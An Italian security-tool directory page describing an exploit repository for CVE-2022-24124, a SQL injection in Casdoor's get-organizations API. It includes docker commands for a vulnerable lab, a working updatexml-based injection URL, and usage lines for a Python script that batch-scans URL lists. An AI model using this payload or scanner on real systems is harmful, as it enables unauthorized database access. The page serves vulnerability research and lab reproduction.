Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-24124 — CVE-2022-24124 exploit | Kitploit
Strumenti/GitHubGitHub/b1gdog/cve-2022-24124
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubb1gdog/cve-2022-24124

CVE-2022-24124

CVE-2022-24124 exploit

Vedi Repository
223 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Prefazione

Casdoor è una piattaforma di autenticazione centralizzata Single Sign-On (SSO) basata su OAuth 2.0/OIDC


Numero

CVE: CVE-2022-24124

CNPD: CNPD-202201-7304


Versioni Interessate

Livello di pericolosità: Alto (7.5 HIGH)

POC/EXP: Pubblico

Casdoor < Casdoor 1.13.1 // tutte le versioni precedenti alla 1.13.1 sono vulnerabili


Descrizione della vulnerabilità

Questa vulnerabilità è di tipo SQL injection. Nell'API di query esiste una vulnerabilità di SQL injection relativa ai parametri field e value, come mostrato in api/get-organizations.


Riproduzione

Scarica l'immagine vulnerabile

docker pull vulfocus/casdoor:1.13.0

Scarica docker

Avvia l'ambiente vulnerabile

docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

dockerRun

Apri la pagina dell'ambiente vulnerabile

Scarica lo strumento

http

Costruisci il payload usando il POC

POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

1661963474975


Script di verifica

Dichiarazione: Lo strumento è solo per scopi di ricerca sulla sicurezza o penetration test autorizzati. L'uso illegale è di esclusiva responsabilità dell'utente. L'autore non si assume alcuna responsabilità, diretta o indiretta.

root@kitploit:~
python3 CVE-2022-24124.py -h

image

root@kitploit:~
python3 CVE-2022-24124.py -u http://127.0.0.1

image

root@kitploit:~
python3 CVE-2022-24124.py -f urls.txt

image


Informazioni correlate

https://nvd.nist.gov/vuln/detail/CVE-2022-24124

https://github.com/ColdFusionX/CVE-2022-24124

https://github.com/0xAbbarhSF/CVE-2022-24124

Riferimento: https://www.t00ls.com/thread-66989-1-1.html

Per esercizio, ho scritto una versione in Python e ho aggiunto una funzione di rilevamento batch.